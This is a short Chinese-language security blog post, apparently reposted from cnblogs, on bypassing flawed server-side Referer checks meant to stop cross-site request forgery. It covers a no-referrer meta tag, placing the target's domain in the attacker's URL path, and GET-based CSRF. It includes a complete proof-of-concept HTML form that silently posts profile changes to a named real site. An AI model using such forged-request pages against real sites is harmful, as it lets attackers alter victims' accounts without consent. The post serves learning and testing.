CSRF绕过后端Referer校验

CSRF绕过后端Referer校验分正常情况和不正常的情况,我们这里主要讨论开发在写校验referer程序时,不正常的情况下怎么进行绕过。

正常情况

正常的情况指服务器端校验Referer的代码没毛病,那么意味着前端是无法绕过的。

我之前考虑过的方案:

  • JS修改Referer,失败;
  • 让用户点击第三方网站,但是浏览器就是使用第三方网站的referer,失败;

不正常的情况

不正常的情况指服务器端校验Referer的代码有漏洞,前端才能做到绕过,下面介绍几个可能会绕过Referer的案例;

添加无Referer标签

可以尝试无Referer标签,万一逻辑刚好没判断无Referer的情况呢;

<meta name="referrer" content="never">

<html>
  <meta name="referrer" content="never">
  <body>
  <script>history.pushState('', '', '/')</script>  <!-- 实现浏览器页面不刷新修改url链接 -->
    <form action="http://www.baidu.com/setProfile" method="POST">
      <input type="hidden" name="nickname" value="new22" />
      <input type="hidden" name="email" value="1&#64;1&#46;com" />
      <input type="hidden" name="team" value="new22" />
      <input type="hidden" name="address" value="new33" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Web站点路径带着referer字段名

原理就是在恶意网站的访问路径上创建成包含原本referer中有的字段名,如果服务端的校验规则只是判断是否包含,那就666了;


GET型CSRF

检验了HTTP Referer就一点问题都没有了吗?答案是:否定的,HTTP Referer只能检查点击的链接来源是来自站内还是站外,如果是GET方式的CSRF,那链接本身就是站内的,也就意味着检验HTTP Referer是无效的。

原文地址:https://www.cnblogs.com/mysticbinary/p/12161537.html